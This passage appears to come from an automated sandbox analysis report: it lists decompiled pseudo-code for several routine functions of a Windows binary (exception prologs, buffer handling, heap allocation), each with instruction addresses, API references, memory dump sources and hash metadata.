				 *((intOrPtr*)(_t70 - 0x24)) = 0;
				 *(_t70 - 0x20) = 0;
				 *((intOrPtr*)(_t70 - 0x1c)) = 0;
				 *((intOrPtr*)(_t70 - 0x18)) = 0;
				 *((char*)(_t70 - 0x14)) = 0;
				 *((intOrPtr*)(_t70 - 4)) = 0;
				_t34 = E01213B26(_t51, _t62, _t70 - 0x24, 0, 0); // executed
				if(_t34 != 0) {
					_t64 =  *(_t70 - 0x20);
					E01211702(_t70 - 0x24, _t62, 1);
					_t68 =  *((intOrPtr*)(_t70 + 8));
					 *((char*)( *(_t70 - 0x20) +  *((intOrPtr*)(_t70 - 0x24)) - 1)) = 0;
					_t16 = _t64 + 1; // 0x1
					E01211879(_t68, _t16);
					_t41 =  *((intOrPtr*)(_t70 - 0x10));
					if( *((intOrPtr*)(_t41 + 0x6cb0)) != 3) {
						if(( *(_t41 + 0x45f4) & 0x00000001) == 0) {
							E012212D6( *((intOrPtr*)(_t70 - 0x24)),  *_t68,  *((intOrPtr*)(_t68 + 4)));
						} else {
							_t66 = _t64 >> 1;
							E01221351( *((intOrPtr*)(_t70 - 0x24)),  *_t68, _t66);
							 *((short*)( *_t68 + _t66 * 2)) = 0;
						}
					} else {
						_push( *((intOrPtr*)(_t68 + 4)));
						_push( *_t68);
						_push( *((intOrPtr*)(_t70 - 0x24)));
						E0122138C();
					}
					E01211879(_t68, E012333F3( *_t68));
					_t49 = 1;
				}
				E012115D1(_t70 - 0x24);
				 *[fs:0x0] =  *((intOrPtr*)(_t70 - 0xc));
				return _t49;
			}











                                                                                                                                                    0x01211e30
                                                                                                                                                    0x01211e30
                                                                                                                                                    0x01211e35
                                                                                                                                                    0x01211e3e
                                                                                                                                                    0x01211e42
                                                                                                                                                    0x01211e45
                                                                                                                                                    0x01211e48
                                                                                                                                                    0x01211e4b
                                                                                                                                                    0x01211e4e
                                                                                                                                                    0x01211e51
                                                                                                                                                    0x01211e59
                                                                                                                                                    0x01211e5f
                                                                                                                                                    0x01211e66
                                                                                                                                                    0x01211e6e
                                                                                                                                                    0x01211e76
                                                                                                                                                    0x01211e81
                                                                                                                                                    0x01211e84
                                                                                                                                                    0x01211e88
                                                                                                                                                    0x01211e8e
                                                                                                                                                    0x01211e93
                                                                                                                                                    0x01211e9d
                                                                                                                                                    0x01211eb5
                                                                                                                                                    0x01211ed6
                                                                                                                                                    0x01211eb7
                                                                                                                                                    0x01211eb7
                                                                                                                                                    0x01211ebf
                                                                                                                                                    0x01211ec8
                                                                                                                                                    0x01211ec8
                                                                                                                                                    0x01211e9f
                                                                                                                                                    0x01211e9f
                                                                                                                                                    0x01211ea2
                                                                                                                                                    0x01211ea4
                                                                                                                                                    0x01211ea7
                                                                                                                                                    0x01211ea7
                                                                                                                                                    0x01211ee6
                                                                                                                                                    0x01211eec
                                                                                                                                                    0x01211eee
                                                                                                                                                    0x01211ef2
                                                                                                                                                    0x01211efd
                                                                                                                                                    0x01211f07

                                                                                                                                                    APIs
                                                                                                                                                    • __EH_prolog.LIBCMT ref: 01211E35
                                                                                                                                                      • Part of subcall function 01213B26: __EH_prolog.LIBCMT ref: 01213B2B
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: H_prolog
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3519838083-0
                                                                                                                                                    • Opcode ID: 0d48682dec05cf09f641eb80d74043841f16a2f48046ee1d87346e0f67de9472
                                                                                                                                                    • Instruction ID: dc87109428b4c0823d9972a389cf726e7551b4100c7de99154a0185eb0175056
                                                                                                                                                    • Opcode Fuzzy Hash: 0d48682dec05cf09f641eb80d74043841f16a2f48046ee1d87346e0f67de9472
                                                                                                                                                    • Instruction Fuzzy Hash: 14215C7291421AAFCF15DFA9D9409EEFBF6FF69300B10006EE945A3254DB325E20CB60
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0122A712, Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 80%
                                                                                                                                                    			E0122A712(void* __ecx, void* __edx, void* __eflags) {
				void* __edi;
				void* __esi;
				short _t33;
				char _t36;
				void* _t47;
				short _t55;
				void* _t57;
				void* _t58;
				short _t60;
				void* _t62;
				intOrPtr _t64;
				void* _t67;

				_t67 = __eflags;
				_t57 = __edx;
				_t47 = __ecx;
				E0122E0E4(E01241E69, _t62);
				_push(_t47);
				E0122E1C0();
				_push(_t60);
				_push(_t58);
				 *((intOrPtr*)(_t62 - 0x10)) = _t64;
				 *((intOrPtr*)(_t62 - 4)) = 0;
				E012113B1(_t62 - 0x7d24, _t57, _t58, _t67, 0); // executed
				 *((char*)(_t62 - 4)) = 1;
				E01211F7F(_t62 - 0x7d24, _t57, _t60, _t62, _t67,  *((intOrPtr*)(_t62 + 0xc)));
				if( *((intOrPtr*)(_t62 - 0x105f)) == 0) {
					 *((intOrPtr*)(_t62 - 0x24)) = 0;
					 *((intOrPtr*)(_t62 - 0x20)) = 0;
					 *((intOrPtr*)(_t62 - 0x1c)) = 0;
					 *((intOrPtr*)(_t62 - 0x18)) = 0;
					 *((char*)(_t62 - 0x14)) = 0;
					 *((char*)(_t62 - 4)) = 2;
					_push(_t62 - 0x24);
					_t50 = _t62 - 0x7d24;
					_t33 = E01211981(_t62 - 0x7d24, _t57);
					__eflags = _t33;
					if(_t33 != 0) {
						_t60 =  *((intOrPtr*)(_t62 - 0x20));
						_t58 = _t60 + _t60;
						_push(_t58 + 2);
						_t55 = E01233413(_t50);
						 *((intOrPtr*)( *((intOrPtr*)(_t62 + 0x10)))) = _t55;
						__eflags = _t55;
						if(_t55 != 0) {
							__eflags = 0;
							 *((short*)(_t58 + _t55)) = 0;
							E0122F300(_t55,  *((intOrPtr*)(_t62 - 0x24)), _t58);
						} else {
							_t60 = 0;
						}
						 *((intOrPtr*)( *((intOrPtr*)(_t62 + 0x14)))) = _t60;
					}
					E01211618(_t62 - 0x24);
					E01211662(_t62 - 0x7d24, _t58, _t60); // executed
					_t36 = 1;
				} else {
					E01211662(_t62 - 0x7d24, _t58, _t60);
					_t36 = 0;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t62 - 0xc));
				return _t36;
			}















                                                                                                                                                    0x0122a712
                                                                                                                                                    0x0122a712
                                                                                                                                                    0x0122a712
                                                                                                                                                    0x0122a717
                                                                                                                                                    0x0122a71c
                                                                                                                                                    0x0122a722
                                                                                                                                                    0x0122a728
                                                                                                                                                    0x0122a729
                                                                                                                                                    0x0122a72c
                                                                                                                                                    0x0122a736
                                                                                                                                                    0x0122a739
                                                                                                                                                    0x0122a747
                                                                                                                                                    0x0122a74b
                                                                                                                                                    0x0122a756
                                                                                                                                                    0x0122a767
                                                                                                                                                    0x0122a76a
                                                                                                                                                    0x0122a76d
                                                                                                                                                    0x0122a770
                                                                                                                                                    0x0122a773
                                                                                                                                                    0x0122a779
                                                                                                                                                    0x0122a77d
                                                                                                                                                    0x0122a77e
                                                                                                                                                    0x0122a784
                                                                                                                                                    0x0122a789
                                                                                                                                                    0x0122a78b
                                                                                                                                                    0x0122a78d
                                                                                                                                                    0x0122a790
                                                                                                                                                    0x0122a796
                                                                                                                                                    0x0122a79d
                                                                                                                                                    0x0122a7a2
                                                                                                                                                    0x0122a7a4
                                                                                                                                                    0x0122a7a6
                                                                                                                                                    0x0122a7ac
                                                                                                                                                    0x0122a7af
                                                                                                                                                    0x0122a7b7
                                                                                                                                                    0x0122a7a8
                                                                                                                                                    0x0122a7a8
                                                                                                                                                    0x0122a7a8
                                                                                                                                                    0x0122a7c2
                                                                                                                                                    0x0122a7c2
                                                                                                                                                    0x0122a7c7
                                                                                                                                                    0x0122a7d2
                                                                                                                                                    0x0122a7d7
                                                                                                                                                    0x0122a758
                                                                                                                                                    0x0122a75e
                                                                                                                                                    0x0122a763
                                                                                                                                                    0x0122a763
                                                                                                                                                    0x0122a7de
                                                                                                                                                    0x0122a7e9

                                                                                                                                                    APIs
                                                                                                                                                    • __EH_prolog.LIBCMT ref: 0122A717
                                                                                                                                                      • Part of subcall function 012113B1: __EH_prolog.LIBCMT ref: 012113B6
                                                                                                                                                      • Part of subcall function 012113B1: new.LIBCMT ref: 0121142F
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: H_prolog
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3519838083-0
                                                                                                                                                    • Opcode ID: 1be952257af704e13e6b570ebf7717bab1614a68459f2995af87198f7968e1ff
                                                                                                                                                    • Instruction ID: 3294ef1849a702f5d1d0d9a7e98bec2f5d55fdcc88cee7cc3c8d7a2f84303770
                                                                                                                                                    • Opcode Fuzzy Hash: 1be952257af704e13e6b570ebf7717bab1614a68459f2995af87198f7968e1ff
                                                                                                                                                    • Instruction Fuzzy Hash: F9217F75C1429AEECF15DF68C9409FDB7F4BF28200F0004AEE90AA3601D7356E15DB64
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 01219283, Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 83%
                                                                                                                                                    			E01219283(void* __ebx, void* __edx, void* __edi, void* __eflags) {
				void* _t21;
				intOrPtr _t22;
				intOrPtr _t27;
				void* _t35;
				intOrPtr _t37;
				intOrPtr _t40;
				void* _t42;
				void* _t49;

				_t35 = __edx;
				E0122E0E4(E01241D77, _t42);
				E01217076(_t42 - 0x20, E01217D9F());
				 *(_t42 - 4) =  *(_t42 - 4) & 0x00000000;
				_t40 = E0121C9AC( *((intOrPtr*)(_t42 + 8)),  *((intOrPtr*)(_t42 - 0x20)),  *((intOrPtr*)(_t42 - 0x1c)));
				if(_t40 > 0) {
					_t27 =  *((intOrPtr*)(_t42 + 0x10));
					_t37 =  *((intOrPtr*)(_t42 + 0xc));
					do {
						_t22 = _t40;
						asm("cdq");
						_t49 = _t35 - _t27;
						if(_t49 > 0 || _t49 >= 0 && _t22 >= _t37) {
							_t40 = _t37;
						}
						if(_t40 > 0) {
							E0121CB91( *((intOrPtr*)(_t42 + 8)), _t42,  *((intOrPtr*)(_t42 - 0x20)), _t40);
							asm("cdq");
							_t37 = _t37 - _t40;
							asm("sbb ebx, edx");
						}
						_t40 = E0121C9AC( *((intOrPtr*)(_t42 + 8)),  *((intOrPtr*)(_t42 - 0x20)),  *((intOrPtr*)(_t42 - 0x1c)));
					} while (_t40 > 0);
				}
				_t21 = E012115D1(_t42 - 0x20); // executed
				 *[fs:0x0] =  *((intOrPtr*)(_t42 - 0xc));
				return _t21;
			}











                                                                                                                                                    0x01219283
                                                                                                                                                    0x01219288
                                                                                                                                                    0x0121929a
                                                                                                                                                    0x012192a8
                                                                                                                                                    0x012192b1
                                                                                                                                                    0x012192b5
                                                                                                                                                    0x012192b8
                                                                                                                                                    0x012192bc
                                                                                                                                                    0x012192bf
                                                                                                                                                    0x012192bf
                                                                                                                                                    0x012192c1
                                                                                                                                                    0x012192c2
                                                                                                                                                    0x012192c4
                                                                                                                                                    0x012192cc
                                                                                                                                                    0x012192cc
                                                                                                                                                    0x012192d0
                                                                                                                                                    0x012192d9
                                                                                                                                                    0x012192e0
                                                                                                                                                    0x012192e1
                                                                                                                                                    0x012192e3
                                                                                                                                                    0x012192e3
                                                                                                                                                    0x012192f3
                                                                                                                                                    0x012192f5
                                                                                                                                                    0x012192fa
                                                                                                                                                    0x012192fe
                                                                                                                                                    0x01219307
                                                                                                                                                    0x01219311

                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: H_prolog
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3519838083-0
                                                                                                                                                    • Opcode ID: 9028dbff4401a87d15b8ab3804bb23018610db719b0d947b3dbdd7a8f9b75308
                                                                                                                                                    • Instruction ID: 364c0ad0dccfed490050ab49eeac5a8921b419ba6582a1b97a0d1b0c47773993
                                                                                                                                                    • Opcode Fuzzy Hash: 9028dbff4401a87d15b8ab3804bb23018610db719b0d947b3dbdd7a8f9b75308
                                                                                                                                                    • Instruction Fuzzy Hash: FE11827792052A97CF21EFA8CC909FDB7B6BFB8610F044515FD0567218DA359D50C6A0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0122CF72, Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 80%
                                                                                                                                                    			E0122CF72(void* __ecx, void* __eflags) {
				void* __ebx;
				intOrPtr _t18;
				char _t19;
				char _t20;
				void* _t23;
				void* _t24;
				void* _t26;
				void* _t37;
				void* _t43;
				intOrPtr _t45;

				_t26 = __ecx;
				E0122E0E4(E01241EA8, _t43);
				_push(_t26);
				E0122E1C0();
				_push(_t24);
				 *((intOrPtr*)(_t43 - 0x10)) = _t45;
				E01235646(0x126386a, "X");
				E0121FDED(0x126588c, _t37, 0x12425b0);
				E01235646(0x126488a,  *((intOrPtr*)(_t43 + 0xc)));
				E01215C29(0x125b578, _t37,  *((intOrPtr*)(_t43 + 0xc)));
				_t4 = _t43 - 4;
				 *(_t43 - 4) =  *(_t43 - 4) & 0x00000000;
				_t18 = 2;
				 *0x1262848 = _t18;
				 *0x1262844 = _t18;
				 *0x1262840 = _t18;
				_t19 =  *0x1257444; // 0x0
				 *0x12616cb = _t19;
				_t20 =  *0x1257445; // 0x0
				 *0x1261704 = 1;
				 *0x1261707 = 1;
				 *0x12616cc = _t20;
				E01217C41(_t43 - 0x2108, _t37,  *_t4, 0x125b578);
				 *(_t43 - 4) = 1;
				E01217DB8(_t43 - 0x2108, _t37,  *_t4);
				_t23 = E01217CD4(_t24, _t43 - 0x2108, _t37); // executed
				 *[fs:0x0] =  *((intOrPtr*)(_t43 - 0xc));
				return _t23;
			}













                                                                                                                                                    0x0122cf72
                                                                                                                                                    0x0122cf77
                                                                                                                                                    0x0122cf7c
                                                                                                                                                    0x0122cf82
                                                                                                                                                    0x0122cf87
                                                                                                                                                    0x0122cf8a
                                                                                                                                                    0x0122cf97
                                                                                                                                                    0x0122cfa8
                                                                                                                                                    0x0122cfb5
                                                                                                                                                    0x0122cfc6
                                                                                                                                                    0x0122cfcb
                                                                                                                                                    0x0122cfcb
                                                                                                                                                    0x0122cfd7
                                                                                                                                                    0x0122cfd8
                                                                                                                                                    0x0122cfdd
                                                                                                                                                    0x0122cfe2
                                                                                                                                                    0x0122cfe7
                                                                                                                                                    0x0122cfec
                                                                                                                                                    0x0122cff1
                                                                                                                                                    0x0122cff7
                                                                                                                                                    0x0122cffe
                                                                                                                                                    0x0122d005
                                                                                                                                                    0x0122d00a
                                                                                                                                                    0x0122d015
                                                                                                                                                    0x0122d019
                                                                                                                                                    0x0122d024
                                                                                                                                                    0x0122d02e
                                                                                                                                                    0x0122d039

                                                                                                                                                    APIs
                                                                                                                                                    • __EH_prolog.LIBCMT ref: 0122CF77
                                                                                                                                                      • Part of subcall function 01217C41: __EH_prolog.LIBCMT ref: 01217C46
                                                                                                                                                      • Part of subcall function 01217C41: new.LIBCMT ref: 01217C8B
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: H_prolog
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3519838083-0
                                                                                                                                                    • Opcode ID: e050c448f6b5d6200d48cfc28bd50de6ddb990023bba3858f28d22f7fa71f24b
                                                                                                                                                    • Instruction ID: 214423cc248e9d45c2704c33c3055254119e1eb94872a0bb60843f996c05344a
                                                                                                                                                    • Opcode Fuzzy Hash: e050c448f6b5d6200d48cfc28bd50de6ddb990023bba3858f28d22f7fa71f24b
                                                                                                                                                    • Instruction Fuzzy Hash: F2112775924280AFC728EB58F848BEC7FE4EBB5310F00809EE444522D5DBB51980DBA1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0121A9C8, Relevance: 1.5, APIs: 1, Instructions: 40COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 95%
                                                                                                                                                    			E0121A9C8(intOrPtr* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				void* __esi;
				intOrPtr _t12;
				intOrPtr _t13;
				intOrPtr _t15;
				intOrPtr _t16;
				intOrPtr* _t22;

				_push(__ecx);
				_t22 = __ecx;
				_t24 =  *((intOrPtr*)(__ecx + 8));
				if( *((intOrPtr*)(__ecx + 8)) == 0) {
					_t15 = E0122E0A0(__edx, __ecx, _t24, 0xb54); // executed
					_v8 = _t15;
					_t25 = _t15;
					if(_t15 == 0) {
						_t16 = 0;
						__eflags = 0;
					} else {
						_t16 = E0121A821(_t15, _t25);
					}
					 *((intOrPtr*)(_t22 + 8)) = _t16;
				}
				_t12 = _a4;
				 *_t22 = _t12;
				if(_t12 == 1) {
					 *(_t22 + 4) =  *(_t22 + 4) & 0x00000000;
				}
				if(_t12 == 2) {
					 *(_t22 + 4) =  *(_t22 + 4) | 0xffffffff;
				}
				if(_t12 == 3) {
					E0121599B( *((intOrPtr*)(_t22 + 8)));
				}
				_t13 = _a8;
				if(_t13 >= 8) {
					_t13 = 8;
				}
				 *((intOrPtr*)(_t22 + 0x10)) = _t13;
				return _t13;
			}










                                                                                                                                                    0x0121a9cb
                                                                                                                                                    0x0121a9cd
                                                                                                                                                    0x0121a9cf
                                                                                                                                                    0x0121a9d3
                                                                                                                                                    0x0121a9da
                                                                                                                                                    0x0121a9df
                                                                                                                                                    0x0121a9e3
                                                                                                                                                    0x0121a9e5
                                                                                                                                                    0x0121a9f0
                                                                                                                                                    0x0121a9f0
                                                                                                                                                    0x0121a9e7
                                                                                                                                                    0x0121a9e9
                                                                                                                                                    0x0121a9e9
                                                                                                                                                    0x0121a9f2
                                                                                                                                                    0x0121a9f2
                                                                                                                                                    0x0121a9f5
                                                                                                                                                    0x0121a9f8
                                                                                                                                                    0x0121a9fd
                                                                                                                                                    0x0121a9ff
                                                                                                                                                    0x0121a9ff
                                                                                                                                                    0x0121aa06
                                                                                                                                                    0x0121aa08
                                                                                                                                                    0x0121aa08
                                                                                                                                                    0x0121aa0f
                                                                                                                                                    0x0121aa14
                                                                                                                                                    0x0121aa14
                                                                                                                                                    0x0121aa19
                                                                                                                                                    0x0121aa1f
                                                                                                                                                    0x0121aa23
                                                                                                                                                    0x0121aa23
                                                                                                                                                    0x0121aa24
                                                                                                                                                    0x0121aa2b

                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 9095faf342d1556563444916553eb39f6ef98b834b6236e064ca20c5c807cac4
                                                                                                                                                    • Instruction ID: b8a7c904da340155fa4f55061c83f5cd0a402e69be51439aa1926ad81a970f69
                                                                                                                                                    • Opcode Fuzzy Hash: 9095faf342d1556563444916553eb39f6ef98b834b6236e064ca20c5c807cac4
                                                                                                                                                    • Instruction Fuzzy Hash: 3FF0AF325327479FDB30DE68C94572A7BE9EB26330F208A1ED595C3284E770E8C08780
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 01215BA7, Relevance: 1.5, APIs: 1, Instructions: 32COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 94%
                                                                                                                                                    			E01215BA7(intOrPtr __ecx, void* __eflags) {
				intOrPtr _t25;
				intOrPtr _t34;
				void* _t36;

				_t25 = __ecx;
				E0122E0E4(E01241BAE, _t36);
				_push(_t25);
				_t34 = _t25;
				 *((intOrPtr*)(_t36 - 0x10)) = _t34;
				E0121AFBD(_t25); // executed
				_t2 = _t36 - 4;
				 *(_t36 - 4) =  *(_t36 - 4) & 0x00000000;
				E0121FDCB();
				 *(_t36 - 4) = 1;
				E0121FDCB();
				 *(_t36 - 4) = 2;
				E0121FDCB();
				 *(_t36 - 4) = 3;
				E0121FDCB();
				 *(_t36 - 4) = 4;
				E0121FDCB();
				 *(_t36 - 4) = 5;
				E01215D9C(_t34,  *_t2);
				 *[fs:0x0] =  *((intOrPtr*)(_t36 - 0xc));
				return _t34;
			}






                                                                                                                                                    0x01215ba7
                                                                                                                                                    0x01215bac
                                                                                                                                                    0x01215bb1
                                                                                                                                                    0x01215bb3
                                                                                                                                                    0x01215bb5
                                                                                                                                                    0x01215bb8
                                                                                                                                                    0x01215bbd
                                                                                                                                                    0x01215bbd
                                                                                                                                                    0x01215bc7
                                                                                                                                                    0x01215bd2
                                                                                                                                                    0x01215bd6
                                                                                                                                                    0x01215be1
                                                                                                                                                    0x01215be5
                                                                                                                                                    0x01215bf0
                                                                                                                                                    0x01215bf4
                                                                                                                                                    0x01215bff
                                                                                                                                                    0x01215c03
                                                                                                                                                    0x01215c0a
                                                                                                                                                    0x01215c0e
                                                                                                                                                    0x01215c19
                                                                                                                                                    0x01215c23

                                                                                                                                                    APIs
                                                                                                                                                    • __EH_prolog.LIBCMT ref: 01215BAC
                                                                                                                                                      • Part of subcall function 0121AFBD: __EH_prolog.LIBCMT ref: 0121AFC2
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: H_prolog
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3519838083-0
                                                                                                                                                    • Opcode ID: 9836c25b7145cd004f032f7bff57f0e55d447bebd3f0cae6cd513db3299fcb1b
                                                                                                                                                    • Instruction ID: c128c3dd2db74aa75497e6ff581cefd7ea0f94d8b063a16810df130199ab726e
                                                                                                                                                    • Opcode Fuzzy Hash: 9836c25b7145cd004f032f7bff57f0e55d447bebd3f0cae6cd513db3299fcb1b
                                                                                                                                                    • Instruction Fuzzy Hash: 8801F430A21689DAC714E7B4C2043FDB7E49F39301F84008E946A132C1CBB82B08D763
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 01238398, Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 94%
                                                                                                                                                    			E01238398(void* __ecx, long _a4) {
				void* __esi;
				void* _t4;
				void* _t6;
				void* _t7;
				void* _t8;
				long _t9;

				_t7 = __ecx;
				_t9 = _a4;
				if(_t9 > 0xffffffe0) {
					L7:
					 *((intOrPtr*)(E012387DA())) = 0xc;
					__eflags = 0;
					return 0;
				}
				if(_t9 == 0) {
					_t9 = _t9 + 1;
				}
				while(1) {
					_t4 = RtlAllocateHeap( *0x12706e4, 0, _t9); // executed
					if(_t4 != 0) {
						break;
					}
					__eflags = E01238214();
					if(__eflags == 0) {
						goto L7;
					}
					_t6 = E01236FF2(_t7, _t8, _t9, __eflags, _t9);
					_pop(_t7);
					__eflags = _t6;
					if(_t6 == 0) {
						goto L7;
					}
				}
				return _t4;
			}









                                                                                                                                                    0x01238398
                                                                                                                                                    0x0123839e
                                                                                                                                                    0x012383a4
                                                                                                                                                    0x012383d6
                                                                                                                                                    0x012383db
                                                                                                                                                    0x012383e1
                                                                                                                                                    0x00000000
                                                                                                                                                    0x012383e1
                                                                                                                                                    0x012383a8
                                                                                                                                                    0x012383aa
                                                                                                                                                    0x012383aa
                                                                                                                                                    0x012383c1
                                                                                                                                                    0x012383ca
                                                                                                                                                    0x012383d2
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x012383b2
                                                                                                                                                    0x012383b4
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x012383b7
                                                                                                                                                    0x012383bc
                                                                                                                                                    0x012383bd
                                                                                                                                                    0x012383bf
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x012383bf
                                                                                                                                                    0x00000000

                                                                                                                                                    APIs
                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000,?,?,?,01233866,?,0000015D,?,?,?,?,01234D42,000000FF,00000000,?,?), ref: 012383CA
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AllocateHeap
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1279760036-0
                                                                                                                                                    • Opcode ID: 05a7a3c79e34af3dbd4746ad57af6297aac750f826fc0d3efcab02b76be4be7f
